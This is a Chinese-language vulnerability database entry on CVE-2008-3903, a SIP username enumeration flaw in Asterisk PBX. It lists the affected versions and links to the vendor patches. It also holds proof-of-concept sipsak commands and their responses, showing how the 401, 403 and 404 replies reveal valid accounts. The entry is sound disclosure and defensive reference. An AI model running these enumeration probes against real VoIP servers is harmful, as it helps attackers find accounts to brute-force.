Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
seebugRootSSV:4993
HistoryApr 04, 2009 - 12:00 a.m.

Asterisk认证SIP响应用户名枚举漏洞

2009-04-0400:00:00
Root
www.seebug.org
16

0.006 Low

EPSS

Percentile

76.0%

JSON

BUGTRAQ ID: 34353
CVE(CAN) ID: CVE-2008-3903

Asterisk是开放源码的软件PBX,支持各种VoIP协议和设备。

如果启用了Digest认证的话,Asterisk PBX对登录期间所尝试的有效和无效SIP用户名会返回不同的响应,远程攻击者可以通过暴力猜测枚举出有效的用户名。

Asterisk Asterisk 1.6.0.x
Asterisk Asterisk 1.4.x
Asterisk Asterisk 1.2.x
Asterisk Business Edition C.2.x.x
Asterisk Business Edition C.1.x.x
Asterisk Business Edition B.x.x
Asterisk s800i 1.3.x
Asterisk

目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

<a href=“http://downloads.digium.com/pub/asa/AST-2009-003-1.2.diff.txt” target=“_blank”>http://downloads.digium.com/pub/asa/AST-2009-003-1.2.diff.txt</a>
<a href=“http://downloads.digium.com/pub/asa/AST-2009-003-1.4.diff.txt” target=“_blank”>http://downloads.digium.com/pub/asa/AST-2009-003-1.4.diff.txt</a>
<a href=“http://downloads.digium.com/pub/asa/AST-2009-003-1.6.0.diff.txt” target=“_blank”>http://downloads.digium.com/pub/asa/AST-2009-003-1.6.0.diff.txt</a>
<a href=“http://downloads.digium.com/pub/asa/AST-2009-003-1.6.1.diff.txt” target=“_blank”>http://downloads.digium.com/pub/asa/AST-2009-003-1.6.1.diff.txt</a>


                                                在启用了alwaysauthreject的Asterisk 1.4上:

无效口令的无效用户

% sipsak-0.9.6/sipsak -IU -a testx -s sip:testX@asteriskbox:5060

SIP/2.0 401 Unauthorized
Via: SIP/2.0/UDP 192.168.1.199:63013;branch=z9hG4bK.5db5cc72;alias;received=192.168.1.199;rport=48834
From: sip:[email protected]:5060;tag=550fcb06
To: sip:[email protected]:5060;tag=as49ef5a0f
Call-ID: [email protected]
CSeq: 2 REGISTER
User-Agent: Asterisk PBX
Allow: INVITE, ACK, CANCEL, OPTIONS, BYE, REFER, SUBSCRIBE, NOTIFY
Supported: replaces
WWW-Authenticate: Digest algorithm=MD5, realm=”asterisk”, nonce=”70f69171″
Content-Length: 0

无效口令的有效用户

% sipsak-0.9.6/sipsak -IU -a test -s sip:test@asteriskbox:5060

SIP/2.0 403 Forbidden (Bad auth)
Via: SIP/2.0/UDP 192.168.111.1:64426;branch=z9hG4bK.53e7c9a7;alias;received=192.168.1.199;rport=40966
From: sip:[email protected]:5060;tag=4e3b4edd
To: sip:[email protected]:5060;tag=as305009f4
Call-ID: [email protected]
CSeq: 2 REGISTER
User-Agent: Asterisk PBX
Allow: INVITE, ACK, CANCEL, OPTIONS, BYE, REFER, SUBSCRIBE, NOTIFY
Supported: replaces
Content-Length: 0

在禁用了alwaysauthreject的Asterisk上:

无效口令的无效用户

% sipsak-0.9.6/sipsak -IU -a testx -s sip:testX@asteriskbox:5060

SIP/2.0 404 Not found
Via: SIP/2.0/UDP 192.168.111.1:62508;branch=z9hG4bK.37dcbfcf;alias;received=192.168.1.199;rport=37469
From: sip:[email protected]:5060;tag=5596ae2f
To: sip:[email protected]:5060;tag=as5620a72f
Call-ID: [email protected]
CSeq: 1 REGISTER
User-Agent: Asterisk PBX
Allow: INVITE, ACK, CANCEL, OPTIONS, BYE, REFER, SUBSCRIBE, NOTIFY
Supported: replaces
Content-Length: 0

无效口令的有效用户

% sipsak-0.9.6/sipsak -IU -a testx -s sip:test@asteriskbox:5060

SIP/2.0 403 Forbidden (Bad auth)
Via: SIP/2.0/UDP 192.168.1.199:62607;branch=z9hG4bK.1b938cca;alias;received=192.168.1.199;rport=35572
From: sip:[email protected]:5060;tag=55aaf11b
To: sip:[email protected]:5060;tag=as4e3f230d
Call-ID: [email protected]
CSeq: 2 REGISTER
User-Agent: Asterisk PBX
Allow: INVITE, ACK, CANCEL, OPTIONS, BYE, REFER, SUBSCRIBE, NOTIFY
Supported: replaces
Content-Length: 0

Related

securityvulns 2
cve 1
redhatcve 1
prion 1
ubuntucve 1
debiancve 1
openvas 4
nessus 2
debian 1
osv 1
gentoo 1
securityvulns
securityvulns
Asterisk VoIP server user accounts enumeration
2009-04-08 00:00:00
AST-2009-003: SIP responses expose valid usernames
2009-04-08 00:00:00
cve
cve
CVE-2008-3903
2008-09-04 19:41:00
redhatcve
redhatcve
CVE-2008-3903
2019-10-04 20:27:44
prion
prion
Authentication flaw
2008-09-04 19:41:00
ubuntucve
ubuntucve
CVE-2008-3903
2008-09-04 00:00:00
debiancve
debiancve
CVE-2008-3903
2008-09-04 19:41:00
openvas
openvas
Debian: Security Advisory (DSA-1952-1)
2009-12-30 00:00:00
Debian Security Advisory DSA 1952-1 (asterisk)
2009-12-30 00:00:00
Gentoo Security Advisory GLSA 200905-01 (asterisk)
2009-05-05 00:00:00
nessus
nessus
Debian DSA-1952-1 : asterisk - several vulnerabilities, end-of-life announcement in oldstable
2010-02-24 00:00:00
GLSA-200905-01 : Asterisk: Multiple vulnerabilities
2009-05-04 00:00:00
debian
debian
[SECURITY] [DSA 1952-1] New asterisk packages fix several vulnerabilities
2009-12-15 13:06:23
osv
osv
asterisk - several vulnerabilities
2009-12-15 00:00:00
gentoo
gentoo
Asterisk: Multiple vulnerabilities
2009-05-02 00:00:00

0.006 Low

EPSS

Percentile

76.0%

JSON
Related for SSV:4993
securityvulns2cve1redhatcve1prion1ubuntucve1debiancve1openvas4nessus2debian1osv1gentoo1